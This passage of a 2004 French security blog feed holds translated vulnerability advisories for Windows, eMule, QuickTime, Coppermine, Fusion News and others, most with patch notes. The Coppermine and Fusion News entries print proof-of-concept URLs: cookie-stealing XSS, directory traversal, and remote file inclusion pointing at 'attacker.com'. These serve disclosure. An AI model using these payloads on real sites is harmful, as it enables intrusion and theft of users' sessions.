&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Il est possible d'éxécuter un code arbitraire chez la victime grâce à une faille présente dans le centre d'aide et de support de Windows en utilisant le protocole HCP.&lt;br /&gt;Cette faille vous donne le contrôle complet de la machine cible, seulement si la victime n'a pas assez fait preuve d'attention.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;une personne malintentionnée peut construire une URL HCP contenant un code malicieux et glisser celle-ci sous forme de lien dans un site, ou dans un email. Elle s'éxécutera que si la victime visite ce lien, ce qui fournira à l'attaquant le contrôle total de la machine.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;patchs disponnibles à cette adresse : http://www.microsoft.com/technet/security/bulletin/MS04-015.mspx ou directement avec Windows Update. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Référence: http://www.microsoft.com/technet/security/bulletin/MS04-015.mspx &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108446025899732942?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446025899732942'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446025899732942'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108446025899732942' title='Vulnerability in Help and Support Center Could Allow Remote Code Execution '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108446022863665544</id><published>2004-05-13T16:56:00.001+02:00</published><updated>2004-05-13T16:57:08.636+02:00</updated><title type='text'>eMule Web Interface Negative Content Length Denial of Service </title><content type='html'>Sujet: eMule Web Interface Negative Content Length Denial of Service &lt;br /&gt;Versions: eMule 0.42g, mais d'autres versions peuvent être faillibles &lt;br /&gt;Auteur: Rafel Ivgi &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Date: 11 Mai 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Une faille a été decouverte dans eMule, qui peut-être exploitée par des personnes malintentionnées pour provoquer un Deni de service.&lt;br /&gt;Plusieurs analyses indiquent que la vulnérabilité provient d'un éxédant de messages d'erreurs dans le panneau de contrôle Web lors du traitement de certaines requêtes HTTP POST.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;On peut l'utiliser pour crasher l'application, par exemple en envoyant une requête POST modifiée, contenant une valeur négative dans l'entête "Content-Length:". &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Filtrer les accès à l'interface Web, ou la désactivée ( en écoute par défaut sur le port 4711/tcp ). &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: Rafel Ivgi &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Référence: http://secunia.com/advisories/11589/ &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108446022863665544?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446022863665544'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446022863665544'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108446022863665544' title='eMule Web Interface Negative Content Length Denial of Service '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108446019877975759</id><published>2004-05-13T16:56:00.000+02:00</published><updated>2004-05-13T16:56:38.780+02:00</updated><title type='text'>Microsoft Internet Explorer Unconfirmed Memory Corruption Vulnerability</title><content type='html'>Sujet: Microsoft Internet Explorer Unconfirmed Memory Corruption Vulnerability &lt;br /&gt;Versions: liste exaustive à cette adresse: http://www.securityfocus.com/bid/10299/info/ &lt;br /&gt;Auteur: E.Kellinis &lt;br /&gt;Traducteur FR: Z4rK &lt;br /&gt;Date: 10 mai 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;On a signalé que Internet Explorer peut être enclin à une vulnérabilité potentielle de corruption de mémoire qui pourrait permettre à un attaquant à distance de causer un "Denial Of Service" dans le browser. Un attaquant créant un site web malveillant qui utilise l'événement 'onLoad' et la fonction 'window.location' (Javascript), semblerait pouvoir accéder à un dossier arbitraire local. &lt;br /&gt;&lt;br /&gt;Il convient de noter que la validité de cette vulnérabilité n'a put être confirmée par un manque de détails. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;La validité de cette vulnérabilité n'ayant été confirmée, aucun exploit n'est actuellement proposé. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;La validité de cette vulnérabilité n'ayant été confirmée, aucune solution n'est actuellement proposée. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: E.Kellinis &lt;br /&gt;Traducteur FR: Z4rK &lt;br /&gt;Référence: http://www.securityfocus.com/bid/10299 &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108446019877975759?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446019877975759'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446019877975759'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108446019877975759' title='Microsoft Internet Explorer Unconfirmed Memory Corruption Vulnerability'/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108446017152014178</id><published>2004-05-13T16:55:00.001+02:00</published><updated>2004-05-13T16:56:11.520+02:00</updated><title type='text'>Apple Mac OS X Server Administration Service Undisclosed Remote Buffer Overflow Vulnerability </title><content type='html'>Sujet: Apple Mac OS X Server Administration Service Undisclosed Remote Buffer Overflow Vulnerability &lt;br /&gt;Versions: Apple Mac OS X 10.2.8 et 10.3.3 Apple Mac OS X Server 10.0 à 10.3.3 &lt;br /&gt;Auteur: Jack C ( &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Date: 8 mai 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Une vulnérabilité de type buffer overflow a été rapporté pour le service d'Apple Mac OS X Server Administration. Ce service est associé exclusivement au port 660.&lt;br /&gt;&lt;br /&gt;Si le service gére une requête de plus de 2056 bytes de long, le systême va se crasher et rebooter. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Aucun exploit connu à ce jour. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Apple a publié un advisory APPLE-SA-2004-05-03 adressantla vulnérabilité. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: Jack C ( &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Référence: http://www.securityfocus.com/bid/9914/info/ &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108446017152014178?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446017152014178'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446017152014178'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108446017152014178' title='Apple Mac OS X Server Administration Service Undisclosed Remote Buffer Overflow Vulnerability '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108446013322751255</id><published>2004-05-13T16:55:00.000+02:00</published><updated>2004-05-13T16:55:33.226+02:00</updated><title type='text'>Apple QuickTime (QuickTime.qts) Heap Overflow Vulnerability </title><content type='html'>Sujet: Apple QuickTime (QuickTime.qts) Heap Overflow Vulnerability &lt;br /&gt;Versions: Apple QuickTime 6.5 Apple iTunes 4.2.0.72 &lt;br /&gt;Auteur: eEye &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Date: 8 mai 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Description :&lt;br /&gt;*************&lt;br /&gt;Le lecteur QuickTime d'Apple est utilisé pour jouer des fichiers audio et vidéo de manière interactive.&lt;br /&gt;&lt;br /&gt;eEye Digital Security a découvert une faille de vulnérabilité dans QuickTime Player. La vulnérabilité permet à un agresseur distant d'écrire sur la heap memory et d'exécuter du code arbitraire dans le systême.&lt;br /&gt;La faille est localisée dans le fichier QuickTime.qts qui permet l'accès aux fonctionalités de QuickTime pour de nombreuses applications. Un fichier video spécialement conçu pourra permettre cette attaque.&lt;br /&gt;&lt;br /&gt;Détail techniques :&lt;br /&gt;*******************&lt;br /&gt;C'est le code du fichier QuickTime.qts qui copie des entrées de tables depuis le data "stsc" dans un espace de la memory heap.&lt;br /&gt;Format:&lt;br /&gt;Offset Type Description&lt;br /&gt;------- ------- --------------------------------&lt;br /&gt;0000h DWORD atom size&lt;br /&gt;0004h DWORD atom type tag ('stsc')&lt;br /&gt;0008h BYTE version&lt;br /&gt;0009h BYTE[3] flags&lt;br /&gt;000Ch DWORD number of entries&lt;br /&gt;0010h ... sample-to-chunk table data&lt;br /&gt;&lt;br /&gt;Le block, qui est censé retenir les data de la table, a une taille alouée égale au (nombre d'entrées + 2)*16&lt;br /&gt;En indiquant une valeur de 0x0FFFFFFE ou plus grand, un dépassement d'intégration en résulte et une allocation insuffisante des blocks. Ce qui donne une re-écriture complète de la heap memory. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Aucun exploit disponible à ce jour. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Aucune solution connue à ce jour. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: eEye &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Référence: http://www.security-corporation.com/articles-20040503-002.html &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108446013322751255?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446013322751255'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446013322751255'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108446013322751255' title='Apple QuickTime (QuickTime.qts) Heap Overflow Vulnerability '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108446009017587461</id><published>2004-05-13T16:54:00.001+02:00</published><updated>2004-05-13T16:54:50.176+02:00</updated><title type='text'>Coppermine Photo Gallery Multiple Input Validation Vulnerabilities</title><content type='html'>Sujet: Coppermine Photo Gallery Multiple Input Validation Vulnerabilities &lt;br /&gt;Versions: Liste exaustive à l'adresse suivante: http://www.securityfocus.com/bid/10253 &lt;br /&gt;Auteur: Janek Vind &lt;br /&gt;Traducteur FR: Z4rK &lt;br /&gt;Date: 5 mai 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Coppermine Photo Gallery est affecté par de multiples vulnérabilités au niveau de la validation des entrées. Certaines d'entre elles peuvent mener à l'exécution de commandes arbitraires. Ces vulnérabilités sont dues au mauvais filtrage de la part de l'application qui ne valident pas l'entrée écrite par l'utilisateur avant de l'employer dans des appels de fonction dynamiques d'exécution de commande de contenu et de système. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ces vulnérabilités peuvent être exploitées pour voler les cookies d'un utilisateur, pour tracer le répertoire racine de l'application affectée, pour exécuter des commandes arbitraires et pour inclure les dossiers arbitraires. D'autres attaques sont également possibles. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Preuve de la vulnérabilité de type Cross site scripting:&lt;br /&gt;&lt;br /&gt;http://www.exemple.com/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"&gt;&lt;body%20onload=alert(document.cookie);&gt; &lt;br /&gt;&lt;br /&gt;Tracer le répertoire racine:&lt;br /&gt;&lt;br /&gt;http://www.exemple.com/nuke72/modules.php?name=coppermine&amp;file=searchnew&amp;startdir=../.. &lt;br /&gt;&lt;br /&gt;Inclure un dossier arbitraire à distance:&lt;br /&gt;&lt;br /&gt;http://www.exemple.com/nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://attacker.com &lt;br /&gt;&lt;br /&gt;http://www.exemple.com/nuke72/modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.com &lt;br /&gt;&lt;br /&gt;http://www.exemple.com/nuke72/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://attacker.com &lt;br /&gt;&lt;br /&gt;http://www.exemple.com/nuke72/modules/coppermine/themes/maze/theme.php?THEME_DIR=http://attacker.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Auncune solution disponible. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: Janek Vind &lt;br /&gt;Traducteur FR: Z4rK &lt;br /&gt;Référence: http://www.securityfocus.com/bid/10253 &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108446009017587461?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446009017587461'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446009017587461'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108446009017587461' title='Coppermine Photo Gallery Multiple Input Validation Vulnerabilities'/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108446006047831530</id><published>2004-05-13T16:54:00.000+02:00</published><updated>2004-05-13T16:54:20.476+02:00</updated><title type='text'>phpwsBB Reveals Non-Anonymous Labels</title><content type='html'>Sujet: phpwsBB Reveals Non-Anonymous Labels &lt;br /&gt;Versions: phpwsBB 0.x phpwsContacts 0.x &lt;br /&gt;Auteur: Stephen Adler &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Date: 28 avril 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Stephen Adler a rapporté une faille de sécurité dans phpwsBB phpwsContacts, permettant à des personnes malveillantes de voir des labels. &lt;br /&gt;&lt;br /&gt;Le problème est que si l'affichage anonyme est désactivé, il est toujours possible de voir les labels des messages. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Aucun exploit nécessaire. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Mise à jour vers les versions phpwsBB 0.9.2 et phpwsContacts 0.8.3 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: Stephen Adler &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Référence: http://secunia.com/advisories/11480/ &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108446006047831530?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446006047831530'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446006047831530'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108446006047831530' title='phpwsBB Reveals Non-Anonymous Labels'/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108446002295839587</id><published>2004-05-13T16:53:00.000+02:00</published><updated>2004-05-13T16:53:42.956+02:00</updated><title type='text'>Windows Explorer / Internet Exporer Long Share Name Buffer Overflow </title><content type='html'>Sujet: Windows Explorer / Internet Exporer Long Share Name Buffer Overflow &lt;br /&gt;Versions: Windows toutes versions, à part 2003. MS Internet Explorer 5.01, 5.5 et 6 &lt;br /&gt;Auteur: Rodrigo Gutierrez &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Date: 27 avril 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Rodrigo Gutierrez a découvert un faille de sécurité dans Windows et Internet Explorer, qui peut être exploitée par des personnes mal intentionnées pour compromettre le système d'un utilisateur. &lt;br /&gt;&lt;br /&gt;Cette faille est causée par une erreur de boundary, qui peut être activée via Internet Explorer et Windows Explorer lors d'une connection à un serveur fichiers. Un buffer overflow peut être activé en paratgeant des fichiers corrompus avec un nom de plus de 300 bytes et ne contenant pas de minuscules. &lt;br /&gt;&lt;br /&gt;L'exploitation de cette faille peut résulter en l'exécution de code arbitraire sur le système de la victime. Il suffit que l'utilisateur se connecte à un serveur, une page Web ou suive un lien qui ciblerait un fichier corrompu. &lt;br /&gt;&lt;br /&gt;D'après Microsoft, la vulnérabilité aurait été adressée dans le SP1 pour Windows XP et le SP4 pour Windows 2000. Cependant, la vulnérabilité a été confirmée sur des systèmes à jour de ces versions. Windows 95,98, Me et NT 4.0 seraient aussi affectés. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Aucun exploit nécessaire. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Restreindre le trafic dans les routers et pare-feux &lt;br /&gt;&lt;br /&gt;Désactiver "Client for Microsoft Networks" pour les cartes réseaux. Cela aura un impact sur le partage en réseau. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: Rodrigo Gutierrez &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Référence: http://secunia.com/advisories/11482/ &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108446002295839587?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446002295839587'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446002295839587'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108446002295839587' title='Windows Explorer / Internet Exporer Long Share Name Buffer Overflow '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108445994024298696</id><published>2004-05-13T16:51:00.000+02:00</published><updated>2004-05-13T16:53:13.736+02:00</updated><title type='text'>Fusion News Cross-Site Scripting Vulnerability </title><content type='html'>Sujet: Fusion News Cross-Site Scripting Vulnerability &lt;br /&gt;Versions: Fusion News 3.6.1 &lt;br /&gt;Auteur: DarkBicho &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Date: 24 avril 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Fusion News est une application gratuite en php. Ce produit est vulnérable aux attaques de type Cross Site Scripting (CSS), permettant à un agresseur d'injecter des codes HTML et des scripts dans les pages Web. Le visiteur croira que l'information vient du site consulté, alors qu'elle sera envoyée par l'agresseur. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;la vulnérabilité XSS est dans "fullnews.php"&lt;br /&gt;&lt;br /&gt;http://site-vulnerable/fullnews.php?id= alert(document.cookie&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Un patch est disponible sur le site du fabricant. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: DarkBicho &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Référence: http://www.security-corporation.com/articles-20040424-001.html &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108445994024298696?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108445994024298696'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108445994024298696'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108445994024298696' title='Fusion News Cross-Site Scripting Vulnerability '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108445885265586725</id><published>2004-05-13T16:33:00.000+02:00</published><updated>2004-05-13T16:34:12.656+02:00</updated><title type='text'>Symantec Multiple Firewall TCP Options Denial of Service Vulnerability</title><content type='html'>Sujet: Symantec Multiple Firewall TCP Options Denial of Service Vulnerability &lt;br /&gt;Versions: Norton Internet Security 2003 et 2004 Personal Firewall 2003 et 2004 Client Firewall 5.01 et 5.11 Client Security 1.0 &lt;br /&gt;Auteur: EEYE &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Date: 24 avril 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br 